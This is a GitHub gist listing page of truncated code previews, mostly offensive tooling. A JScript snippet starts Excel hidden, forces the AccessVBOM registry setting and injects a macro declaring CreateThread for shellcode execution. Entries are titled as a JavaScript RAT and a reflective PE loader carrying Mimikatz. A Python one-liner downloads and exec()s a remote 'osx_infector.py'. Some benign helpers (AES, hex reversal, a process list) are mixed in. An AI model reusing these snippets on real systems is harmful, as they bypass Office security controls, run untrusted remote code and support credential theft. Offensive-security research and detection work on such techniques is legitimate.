midnite_runr secretsquirrel

View gist:b425e8490bc2dfcbf1f9f69f065ecc84
cat /tmp/test.sh
:; if [ -z 0 ]; then
@echo off
goto :WINDOWS
fi
# sh/cmd polyglot header above: under sh, `:` is a no-op and `[ -z 0 ]` is false
# ("0" is a non-empty string), so the two batch lines are never executed; cmd reads
# line 1 as a label, runs `@echo off`, then `goto :WINDOWS` jumps to a label that is
# not part of this excerpt. Everything from here on runs only under sh.
# Usage check: only the second argument is tested, so a missing $1 with a present $2
# would pass this guard.
if [ -z "$2" ]; then
echo "usage: $0 <firstArg> <secondArg>"
exit 1
fi
View windows.h__.js
// Native-binding plumbing for the definitions that follow: node-ffi for calling
// into native libraries, ref/ref-struct for C types, and the local Library helper.
var ffi = require('ffi');
var ref = require('ref');
var Struct = require('ref-struct');
var Library = require('./Library');
// Short aliases for the ref helpers used throughout the file.
var Type = ref.Type;
var NULL = ref.NULL;
var isNull = ref.isNull;
// Presumably the section names the definitions below are organised under — verify
// against the rest of the file.
var groups = ['libs', 'types', 'structs', 'callbacks', 'enums'];
secretsquirrel / example.js
Created Feb 13, 2017
Shellcode via Office via . JS
// Starts Excel through COM and keeps its window hidden.
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
// WScript.Shell is used below only for the registry write.
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
// AccessVBOM is Excel's "Trust access to the VBA project object model" setting;
// forcing it to 1 is what lets the VBProject calls below succeed.
// Defender note: a script writing this per-user value is a well-known detection
// point; NOTE(review): a group-policy-managed copy of the setting is expected to
// take precedence over this HKCU key — confirm for the Office versions in scope.
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
// VBComponents.Add(1): component type 1 is a standard module (vbext_ct_StdModule).
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
// strCode starts with a VBA Declare for kernel32!CreateThread using randomised
// parameter names; the rest of the macro source is outside this preview.
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
secretsquirrel / rat.cs
Created Feb 13, 2017
WCF - JavaScript JS Rat Basic Prototype
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.ServiceModel;
using System.ServiceModel.Description;
using System.Reflection;
[ServiceContract]
secretsquirrel / PELoader.cs
Created Feb 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
secretsquirrel / PowershellAes.ps1
Created Oct 10, 2016 — forked from ctigeek/PowershellAes.ps1
Aes Encryption using powershell.
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
secretsquirrel / speed_pw0n.sh
Last active Feb 7, 2017 — forked from mrbrutti/speed_pw0n.sh
Speedy Gonzales
# NOTE(review): fetches a script over HTTPS and exec()s it in-process; the only
# integrity control is the commit hash embedded in the raw-gist URL, so treat this
# as remote code execution from a third party. Uses Python 2's urllib.urlopen
# (Python 3 moved it to urllib.request.urlopen).
python -c 'import urllib; exec(urllib.urlopen("https://gist.githubusercontent.com/secretsquirrel/2ba497786027472f98dd/raw/e2fb41c2a8a4520cc47548fc88a68ef091278fc9/osx_infector.py").read())'
secretsquirrel / reverse_string.py
Last active Mar 1, 2016
just to get reverse hex values of strings
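def reverse_string(somestring):
    """Print and return the hex code points of ``somestring`` in reverse order.

    Each character is emitted as its lowercase hex code point, zero-padded to
    at least two digits (code points above 0xff take more digits), in reverse
    character order with no separators: ``"abc"`` -> ``"636261"``.

    Args:
        somestring: the string to reverse and hex-encode.

    Returns:
        The hex string. It is also printed, so existing callers that only
        relied on the printed output keep working.
    """
    # '02x' zero-pads single-digit values (e.g. '\n' -> '0a'); the earlier
    # padding branch appended the digit twice plus '0' instead of prefixing '0'.
    temp = ''.join(format(ord(ch), '02x') for ch in reversed(somestring))
    print(temp)
    return temp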
View test.csv
date revenue
6/28/14 37432000000
6/29/14 37432000000
6/27/14 37432000000
6/26/14 37432000000
6/25/14 37432000000
6/24/14 37432000000
6/23/14 37432000000
secretsquirrel / vm_base_processes_after_boot_10.10.txt
Created Feb 5, 2015
List of processes after boot on OS X Yosemite VM
UID PID TTY TIME CMD
0 1 ?? 0:01.72 /sbin/launchd
0 19 ?? 0:00.30 /usr/sbin/syslogd
0 20 ?? 0:00.37 /usr/libexec/UserEventAgent (System)
0 22 ?? 0:00.38 /usr/libexec/kextd
0 23 ?? 0:00.97 /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
0 25 ?? 0:00.03 /usr/libexec/thermald
0 28 ?? 0:00.30 /usr/libexec/configd
0 29 ?? 0:00.09 /System/Library/CoreServices/powerd.bundle/powerd
0 32 ?? 0:00.04 /usr/libexec/airportd